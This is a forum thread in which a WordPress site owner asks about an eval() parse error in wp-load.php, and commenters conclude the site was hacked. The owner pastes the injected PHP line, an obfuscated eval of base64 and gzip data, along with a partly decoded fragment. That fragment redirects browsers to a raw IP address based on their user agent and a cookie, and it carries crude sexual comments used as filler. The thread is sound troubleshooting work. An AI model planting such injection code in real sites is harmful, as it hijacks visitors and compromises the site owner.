# Warning: Unexpected character in input: '' (ASCII=127) state=0

Tags: wordpress, wp-admin

I got this problem

> Warning: Unexpected character in input: '' (ASCII=127) state=0 in
>   /home/penumbr9/public_html/wp-load.php(1) : eval()'d code on line 1
>
> Parse error: in /home/penumbr9/public_html/wp-load.php(1) : eval()'d
>   code on line 1.

Didn't know when this happen because since 1 month I didn't open the website.
But I think it happened when auto updated wordpress.

Also can open `wp-admin` or known as dashboard

Comment: Sounds like your website got hacked, Try to install WordPress files manually.

More info: https://www.wordfence.com/learn/how-to-manually-upgrade-wordpress-themes-and-plugins/

Comment: how my website can be hack? useless website for testing only

Comment: Did you installed any cracked, nulled theme or plugin? Updating wordpress manually will fix the issue.

Comment: I think not also my wordpress, my subdomain also redirect at first. Need 3 times to refresh before redirect

Comment: Did you check your console for errors?

Comment: I ask the expert it say my php file has been hack.

In my php file
Got this line

<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbU0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?><?php

How to decode this?

Comment: That's why I have referred your website has been hacked. As @GarthBaker mentioned check for the logs for more info.

Comment: After decode it, i got something like this.
if(!empty/*Bloodninja: I lick your earlobe, and undo watch.*/($_SERVER["HTTP_USER_AGENT"])):$_™¨ÃÆ±ÄÄ=array("Chro\155e","\x46\151refo\x78","Trident","MSIE","W\151ndows","\x4cinux","Ip\150on\x65","Android","Opera","Safari");foreach($_™¨ÃÆ±ÄÄ as$_Œß…”…):if(sTRipos($_SERVER["HTTP_\x55SER_AGENT"],$_Œß…”…)!==/.*/):if(!isset($_COOKIE["\x68tp_uid_ut\x6d"])):sETcOOKIe("htp_ui\x64_u\164m","1",TiME()+07020/*Sarah19fca: Yeah I like it rough.*/*030/*Bloodninja: I smack you thick booty.*/*02);HeadEr("Location: http://134.\x3249.116.78/ind\x65x.php");die